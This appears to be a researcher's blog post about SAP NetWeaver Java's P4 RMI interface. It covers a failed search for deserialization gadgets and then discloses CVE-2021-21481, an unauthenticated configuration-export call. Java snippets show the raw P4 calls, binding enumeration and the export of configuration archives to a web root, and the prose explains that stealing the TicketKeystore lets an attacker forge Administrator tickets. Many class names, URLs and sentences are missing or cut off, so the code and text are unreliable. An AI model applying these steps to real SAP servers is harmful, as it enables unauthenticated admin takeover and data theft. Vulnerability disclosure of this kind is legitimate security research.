The reader is assumed to be familiar with Java Deserialization and should have a basic understanding of Remote Method Invocation (RMI) in Java.
It was in 2016 when I first started to look into the topic of Java Exploitation, or, more precisely: into exploitation of unsafe deserialization of Java objects. Because of my professional history, it made sense to have a look at an SAP product that was written in Java. Naturally, the P4 protocol of SAP NetWeaver Java caught my attention since it is an RMI-like protocol for remote administration, similar to Oracle WebLogic's T3. In May 2017, I published a blog post about an exploit that was getting RCE by using the Jdk7u21 gadget. At that point, SAP had already provided a fix long ago. Since then, the subject has not left me alone. While there were new deserialization gadgets for Oracle's Java server product almost every month, it surprised me no one ever heard of an SAP deserialization gadget with comparable impact. Even more so, since everybody who knows SAP software knows the vast amount of code they ship with each of their products. It seemed very improbable to me that they would be absolutely immune against the most prominent bug class in the Java world of the past six years. In October 2020 I finally found the time and energy to set off for a new hunt. To my great disappointment, the search was in the end not successful. A gadget that yields RCE similar to the ones from the famous ysoserial project is still not in sight. However in January, I found a completely unprotected RMI call that in the end yielded administrative access to the J2EE Engine. Besides the fact that it can be invoked through P4 it has nothing in common with the deserialization topic. Even though a mere chance find, it is still highly critical and allows to compromise the security of the underlying J2EE server.The bug was filed as CVE-2021-21481. On march 9th 2021, SAP provided a fix. SAP note 3224022 describes the details.
P4 and JNDI
Listing 1 shows a small program that connects to a SAP J2EE server using P4:import; | |
import java.util.Properties; | |
import javax.naming.Context; | |
import javax.naming.InitialContext; | |
import; | |
public class Sample { | |
public static void main(String[] args) throws Exception | |
{ | |
Properties p = new Properties(); | |
p.put("java.naming.factory.initial", ""); | |
p.put("java.naming.provider.url", "p4://; | |
p.put("", "Administrator"); | |
p.put("", "xxxxxxxx"); | |
Context ctxt = new InitialContext (p); | |
KeystoreManagerWrapper keysMngr = (KeystoreManagerWrapper) ctxt.lookup ("keystore"); | |
KeyStore keystore = keysMngr.getKeystore("whatever"); | |
} | |
} |
. Other than that, everything is
encapsulated by P4 RMI calls (for those who want to refresh their memory about
Furthermore, it is not obvious that what is going on behind the scenes has
something to do with RMI. However, if you inspect more closely the types of the
involved Java objects, you'll find that keysMngr
is of type
(implementing interface KeystoreManagerWrapper
) and
is a plain vanilla RMI-call. The argument (the name
of the keystore to be instantiated) will be serialized and sent to the server
which will return a serialized keystore object (in this case it won't because
there is no keystore "whatever"). Also not obvious is that the instantiation
of the InitialContext
requires various RMI calls in the background, for
example the instantiation of a RemoteLoginContext
object that will allow to
process the login with the provided credentials.
Each of these RMI calls would in theory be a sink to send a
deserialization gadget to. In the exploit I mentioned above, one of the first
calls inside new InitialContext()
was used to send the Jdk7u21 gadget
(instead of a java.lang.String
object, by the way).
Now, since the Jdk7u21 gadget is not available anymore and I was looking for a gadget consisting merely of SAP classes, I had to struggle with a very annoying limitation: The classloader segmentation. SAP J2EE knows various types of software components: interfaces, services, libraries and applications (which can consist of web applications and EJBs). When you deploy a component, you have to declare the dependencies to other components your component relies upon. Usually, web applications depend on 2-3 services and libraries which will have a couple of dependencies to other services and libraries, as well. At the bottom of this dependency chain are the core components.
Now, the limitation I was talking about is the fact that the dependency management greatly affects which classes a component can see: It can precisely see all classes of all components it relies upon (plus of course JDK classes) but not more. If your class ships as part of the keystore service above, it will only be able to resolve classes from components the keystore service declares as dependencies.
Figure 1: dependencies of the keystore service with all child and parent classloaders
This has dramatic consequences for gadget development. Suppose you found a
gadget whose classes come from components X, Y and Z but there are no
dependencies between these components and in addition, there is no component
which depends on all of them. Then, no matter in which classloader context your
gadget will be deserialized, at least one of X, Y or Z will be missing in the
classpath and the deserialization will end up in a ClassNotFoundException
By using a similar approach to the one described in the GadgetProbe
project I found out that at the
point the Jdk7u21 gadget was deserialized in the above mentioned exploit, there
were only about 160 non-JDK classes visible that implement
. Not ideal for building an exploit.
Going back to listing 1, in case we send a gadget instead of the string
"whatever", we can tell from figure 1 that classes from ten components (the
ones listed beneath "Direct parent loaders") will be in the class path.
Code that sends an arbitrary serializable object instead of the string
"whatever" could e.g. look like this (instead of keysMgr.getKeystore()
Properties p = new Properties(); | |
[...] | |
Context ctxt = new InitialContext(p); | |
RemoteRef ref = (RemoteRef) ctxt.lookup ("keystore"); | |
StubBaseInfo info = (StubBaseInfo) ref.getObjectInfo(); | |
Field f = InitialContext.class.getDeclaredField ("defaultInitCtx"); | |
f.setAccessible (true); | |
ClientContext clientCtxt = (ClientContext) f.get(ctxt); | |
StubImpl stub = (StubImpl) clientCtxt.getRemoteContext (); | |
stub.p4_setInfo (info); | |
Call call = stub.p4_newCall ("getKeystore(java.lang.String)"); | |
P4ObjectOutput out = call.getOutputStream (); | |
out.writeObject ("whatever"); | |
stub.p4_invoke (call); | |
Serializable robj = (Serializable) call.getResultStream().readObject(); |
With this approach, the critical mass of accessible serializable classes can be significantly increased. The telnet interface of SAP J2EE provides useful information about the services and their dependencies.
Regardless of the classloader challenge, I was eager to get an overview of how
many serializable classes existed in the server. The number of classes in the
core layer, services and libraries amounts to roughly 100,000, and this does
not even count application code. I quickly realized that I needed something
smarter than the analysis features of Eclipse to handle such volumes. So I
developed my own tool which analyses Java bytecode using the OW2 ASM
Framwork. It writes object and interface inheritance
dependencies, methods, method calls and attributes to a SQLite DB. It turned
out that out of the 100,000 classes, about 16,000 implemented
. The RDBMS approach was pretty handy since it allowed
build complex queries like
Give classes which are Serializable and Cloneable which implement private void readObject(
and whose toString()
method exists and has more than five calls to distinct other methods
This question translates to
select clzname from CLASSES where ROWID in ( | |
select clazz from EXTENDS where superclazz in ( | |
select ROWID from CLASSES where clzname='java/io/Serializable' | |
or clzname='java/lang/Cloneable' | |
) | |
) and ROWID in ( | |
select decl_class from METHODS where name='readObject' | |
and signature='(Ljava/io/ObjectInputStream;)V' | |
) and ROWID in ( | |
select caller from METHODINSN where callermethod in ( | |
select ROWID from METHODS where name='toString' and signature='()Ljava/lang/String;' | |
) group by callermethod having count(distinct calleemethod) > 5 | |
); |
The work on this tool and also the process of constantly inventing new and
original queries to find potentially interesting classes was great fun.
Unfortunately, it was also in vain. There is a library, which almost allowed
to build a wonderful chain from a toString()
call to the ubiquitous
, but the API provided by the library is
so very complex and undocumented that, after two months, I gave up in total frustration.
There were some more small findings which don't really deserve to
be mentioned. However, I'd like to elaborate on one more thing before I'll
start part two of the blog post, that covers the real vulnerability.
One of the first interesting classes I discovered performs a JNDI lookup with
an attacker controlled URL in private void readObject(
. What would have been a direct hit four
years ago could at least have been a respectable success in 2020. Remember:
Oracle JRE finally switched off remote classloading when resolving LDAP
references in 2019 in version JRE 1.8.0_191. Had this been exploitable, it
would have opened up an attack avenue at least for systems with outdated JRE.
My SAP J2EE was running on top of a JRE version 1.8.0_51 from 2015, so the JNDI
injection should have worked, but, to my great surprise, it didn't.
The reason can be found in the method getObjectInstance
of javax.naming.spi.DirectoryManager
public static Object | |
getObjectInstance(Object refInfo, Name name, Context nameCtx, | |
Hashtable<?,?> environment, Attributes attrs) | |
throws Exception { | |
ObjectFactory factory; | |
ObjectFactoryBuilder builder = getObjectFactoryBuilder(); | |
if (builder != null) { | |
// builder must return non-null factory | |
factory = builder.createObjectFactory(refInfo, environment); | |
if (factory instanceof DirObjectFactory) { | |
return ((DirObjectFactory)factory).getObjectInstance( | |
refInfo, name, nameCtx, environment, attrs); | |
} else { | |
return factory.getObjectInstance(refInfo, name, nameCtx, | |
environment); | |
} | |
} | |
// use reference if possible | |
Reference ref = null; | |
if (refInfo instanceof Reference) { | |
ref = (Reference) refInfo; | |
} else if (refInfo instanceof Referenceable) { | |
ref = ((Referenceable)(refInfo)).getReference(); | |
} | |
Object answer; | |
if (ref != null) { | |
String f = ref.getFactoryClassName(); | |
if (f != null) { | |
// if reference identifies a factory, use exclusively | |
=======> factory = getObjectFactoryFromReference(ref, f); | |
[...] | |
} else { | |
[...] | |
} | |
} |
is where an attacker needs to get to. The method resolves the JNDI reference using an URLClassLoader
and an attacker-supplied codebase. However, as one can easily see, if getObjectFactoryBuilder()
returns a non-null object the code returns in either of the two branches of the following if-clause and the call to getObjectFactoryFromReference
below is never reached.
And that is exactly what happens. SAP J2EE registers an ObjectFactoryBuilder
of type
. This class will try to find a factory class based on the factoryName
-attribute and completely ignore the codebase
-attribute of the JNDI reference.
Bottom line is that JNDI injection might never have worked in SAP J2EE, which would eliminate one of the most important attack primitives in the context of Java Deserialization attacks.
After digressing about how I searched for deserialization gadgets, I'd like to cover the real vulnerability now, which has absolutely nothing to do with Java Deserialization. It is a plain vanilla instance of CWE-749: Exposed Dangerous Method or Function. Let's go back to Listing 1. We can see that the JNDI context allows to query interfaces by name, in our example we were querying theKeyStoreManager
interface by the name "keystore". On several occasions, I had
already tried to find an available rich client for SAP J2EE Engine
administration that uses P4. Every time I was unsuccessful, I believed such a
client did not officially exist, or at least was not at everyone's disposal.
However, whenever you install a SAP J2EE Engine, the P4 port is enabled by default and listening on the same network interface as the HTTP(s) services. Because I was totally focussing on Deserialization, for a long time I was oblivious how much information one can glean through the JNDI context. E.g. it is trivial to get all bindings:
Context ctxt = new InitialContext(p); | |
Enumeration<NameClassPair> e = ctxt.list("/"); | |
while (e.hasMoreElements()) { | |
NameClassPair ncp = e.nextElement(); | |
String name = ncp.getName(); | |
Object obj = null; | |
try { | |
obj = ctxt.lookup (name); | |
} | |
catch (Exception exc) { | |
try { | |
obj = ctxt.lookup ("/" + name); | |
} | |
catch (Exception e2) { | |
System.out.println (name + " ==> " + e2.getMessage()); | |
} | |
} | |
System.out.print(name + " (" + className + ") ==> "); | |
if (obj == null) { | |
System.out.println ("null"); | |
continue; | |
} | |
String clzName = obj.getClass().getName(); | |
if (clzName.startsWith("com.sun.proxy.$Proxy")) { | |
Class clz = obj.getClass(); | |
Class ifs[] = clz.getInterfaces(); | |
System.out.println (" Proxy implementing"); | |
for (Class _if : ifs) { | |
System.out.println (" " + _if.getName()); | |
} | |
} | |
else { | |
System.out.println (obj.getClass().getName()); | |
} | |
} |
call allows to simply iterate through all bindings:
Interesting items are proxy objects and the _Stub
objects. E.g. the proxy for
can be cast to
During debugging of the server, I had already encountered the class
, long before I executed the call from Listing 5. The class
has a method openCfg(String path)
and it was not difficult to establish that the
server version of the call didn't perform any authorization check. This one
definitively looked fishy to me, but since I wasn't looking for unprotected RMI
calls I put the finding into the box with the label "check on a rainy sunday
afternoon when the kids are busy with someone else".
But then, eventually, I did check it. It didn't take long to realize that I
had found a huge problem. Compare Listing 6.
import; import | |; | |
[...] | |
String configPath = ...; | |
String localPathOnServer = ...; | |
String [] pathElements = tokenizeConfigPathSomehow (configPath); | |
JUpgradeIF upgradeIF = (JUpgradeIF) ctxt.lookup ("MigrationService"); | |
Configuration config = upgradeIF.openCfg (pathElements [0]); | |
for (int i=1; i<pathElements.length; i++) { | |
config = config.getSubConfiguration (pathElements [i]); | |
} | |
config.export (localPathOnServer + "/"); |
by querying the JNDI context with name
"MigrationService", gets an instance of a Configuration
object by a call to
and then walks down the path to the leaf node. The element found there
can be exported to an archive that is stored in the file system of the server
(call to export(String path)
). If carefully chosen, the local path on the
server will point to a root folder of a web application. There,
can simply be downloaded through HTTP. If you want to check for yourself, the
UME configuration is stored at
You'd probably say "hey! I need to be Administrator to do that! Where's the harm?". Right, I thought so, too. But neither do you need to be Administrator, nor do you even have to be authenticated. The following code works perfectly fine:
Properties p = new Properties(); | |
p.put("java.naming.factory.initial", ""); | |
p.put("java.naming.provider.url", "p4://; | |
Context ctxt = new InitialContext (p); | |
KeystoreManagerWrapper keysMngr = (KeystoreManagerWrapper) ctxt.lookup ("keystore"); |
from Listing 5. The fact that authentication is
not needed at this point is not new at all by the way, compare CVE-2017-5372.
However, you will get a permission exception when calling
(because getKeystore()
does have a permission
check). But JUpgradeIF.openCfg()
was missing the check until SAP fixed it.
At this point, even without SAP specific knowledge an attacker can cause significant harm. E.g. flood the server's file system with archives causing a resource exhaustion DoS condition.
With a little insider knowledge one can get admin access. In the configuration tree, there is a keystore called TicketKeystore. Its cryptographic key pair is used to sign SAP Logon Tickets. If you steal the keystore, you can issue a ticket for the Administrator user and log on with full admin rights. There are also various other keystores, e.g. for XML signatures and the like (let alone the fact that there is tons of stuff in this store. No one probably knows all the security sensitive things you can get access to ...)
This information should be sufficient to the understanding of CVE-2021-21481. The exact location of the keystores in the configuration and the relative local path in order to download the archive by HTTP are left as an exercise to the reader.